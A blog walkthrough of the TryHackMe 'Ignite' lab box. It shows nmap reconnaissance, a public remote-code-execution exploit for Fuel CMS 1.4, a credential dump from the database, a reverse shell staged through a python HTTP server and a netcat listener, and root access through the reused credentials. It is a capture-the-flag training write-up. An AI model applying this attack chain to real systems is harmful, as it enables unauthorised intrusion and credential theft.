This post is related to the walk-through of another THM box ignite. Let’s get started.
First, we need to get the basic information of ports and services on the machine and for that, I am using Nmap.
nmap -sC -sV -Pn 10.10.230.100
Based on the results we can see a webserver running on it. Additionally, it shows that website is a fuel CMS that is running on Apache.
"A content management system is a computer software used to manage the creation and modification of digital content. CMSs are typically used for enterprise content management and web content management"
We got one entry in robots.txt. Let’s navigate to that path to gather more information.
As mentioned above, it is designed using Fuel CMS ( Version 1.4). If we scroll further we got some critical information about the website which will be likely useful to us in the future. I have explored the admin console of the website but did not find anything useful.
I have checked on the internet for any exploits and luckily got one. Let’s see what we can do with it.
This exploit works for all versions if they are ≤1.4.1 and it uses python2.7. To use this exploit against the server, we need to modify some of the fields in the exploit. Let’s change the URL to our web server modify the command to any customized out, here I am changing it to a basic output command “whoami”.
We have burp request information in the exploit, so let’s intercept the traffic and see what it shows:
We have executed the “whoami” as our output command and the response was accurate(www-data — which is the user of the machine). Let’s try one more time to make sure that it’s working as designed.
Okay, we got the result. Now we are going to use the database path which we got from the website to check if we can get any useful info.
Hurrah, We got the whole dump of the database including the root password, we will store this credentials for future use. But before that, we need the shell access of the web-server, which can be done using a reverse shell. But, the question is how are we going to gain the shell. We can use file inclusion vulnerability to upload the reverse shell into the target machine. Let’s start a simple HTTP server using python.
python -m SimpleHTTPServer 80
We can see an HTTP server running on the localhost, now we need to provide the path of our reverse shell script in our burp request.
We have provided the path of our reverse shell exploit in our burp request of Fuel CMS exploit and it worked.
Now we need to set up a listener for our host using Netcat.
nc -lvnp 1234
We got our shell with www-data as the user. Now, we need to check our first flag.
We got our first flag Now we need to do the privilege escalation to get root access as well as the root flag. But, we remember that we got the root credentials from the database. Let’s try them to gain access.
Yesssss! We got the root access using the credentials and we were able to access the root flag too.
Thanks for reading this and Please provide your comments so that I can improve myself.
My other walkthrough article — TryHackme -Brooklyn 9–9 Walkthrough